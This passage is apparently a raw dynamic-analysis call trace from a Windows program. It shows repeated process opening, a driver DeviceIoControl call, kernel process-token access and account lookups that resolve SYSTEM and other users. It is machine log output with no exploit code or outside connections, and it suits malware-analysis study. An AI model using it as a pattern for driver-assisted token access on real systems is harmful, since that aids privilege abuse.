ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.975] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.975] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.975] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="LOCAL SERVICE", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.976] CloseHandle (hObject=0x1a8) returned 1 [0264.976] CloseHandle (hObject=0x180) returned 1 [0264.976] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699999a0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699d7090, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068bd4b90, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068bd4b90, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068bcf590, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068bd4600, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068bd4890, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699bd090, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699cd470, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699d7280, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.976] ObQueryNameString (in: Object=0xffffe000699d5d10, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffe000699ffce0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffe0006a552090, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffe00069bd3b40, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffe00069a2b060, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.977] ObQueryNameString (in: Object=0xffffe00069f5f250, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d0) returned 0x180 [0264.977] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.977] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069a01680, HandleInformation=0x0) returned 0x0 [0264.977] ObOpenObjectByPointer (in: Object=0xffffe00069a01680, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.977] ObfDereferenceObject (Object=0xffffe00069a01680) returned 0x48071 [0264.977] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.977] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.977] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.977] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.978] CloseHandle (hObject=0x1a8) returned 1 [0264.978] CloseHandle (hObject=0x180) returned 1 [0264.978] ObQueryNameString (in: Object=0xffffe00069a7c090, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffc00148aaea80, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffc00148ac5bb0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffc00148ac7920, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00069a9a210, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.978] ObQueryNameString (in: Object=0xffffe00069b531f0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069bde090, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069be9500, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069dc6090, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069dd5090, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] ObQueryNameString (in: Object=0xffffe00069de1610, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e0) returned 0x180 [0264.979] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.979] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069ad7840, HandleInformation=0x0) returned 0x0 [0264.979] ObOpenObjectByPointer (in: Object=0xffffe00069ad7840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.979] ObfDereferenceObject (Object=0xffffe00069ad7840) returned 0x37fa7 [0264.979] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.979] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.979] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.979] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.981] CloseHandle (hObject=0x1a8) returned 1 [0264.981] CloseHandle (hObject=0x180) returned 1 [0264.981] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00069adf710, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffc00149407220, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffc00148aaea80, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe0006a0be7f0, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe0006a0bec40, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffc00149558750, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffe0006a0bea30, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.981] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.982] ObQueryNameString (in: Object=0xffffe0006a02ef20, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0x180 [0264.982] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.982] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069e0d840, HandleInformation=0x0) returned 0x0 [0264.982] ObOpenObjectByPointer (in: Object=0xffffe00069e0d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.982] ObfDereferenceObject (Object=0xffffe00069e0d840) returned 0x40053 [0264.982] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.982] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.982] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.982] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.983] CloseHandle (hObject=0x1a8) returned 1 [0264.983] CloseHandle (hObject=0x180) returned 1 [0264.983] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffe00069e4cb60, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffe00069ee7880, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffc001494aaa70, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffc0014956db10, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] ObQueryNameString (in: Object=0xffffc00149552ae0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d0) returned 0x180 [0264.983] DeviceIoControl (hDevice=0x164, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0) [0264.983] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e498, HandleInformation=0x0 | out: Object=0xffffd000b1b8e498*=0xffffe00069e0f840, HandleInformation=0x0) returned 0x0 [0264.983] ObOpenObjectByPointer (in: Object=0xffffe00069e0f840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000b1b8e4a0 | out: Handle=0xffffd000b1b8e4a0*=0xffffffff80000d8c) returned 0x0 [0264.984] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x38053 [0264.984] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000d8c, DesiredAccess=0x8, TokenHandle=0xffffe0006a287b00 | out: TokenHandle=0xffffe0006a287b00*=0x1a8) returned 0x0 [0264.984] ZwClose (Handle=0xffffffff80000d8c) returned 0x0 [0264.984] GetTokenInformation (in: TokenHandle=0x1a8, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0264.984] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0264.985] CloseHandle (hObject=0x1a8) returned 1 [0264.985] CloseHandle (hObject=0x180) returned 1 [0264.985] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffe00069e25d70, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffc00148565d70, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffc00148555690, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffc00148472250, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.985] ObQueryNameString (in: Object=0xffffe0006a080090, 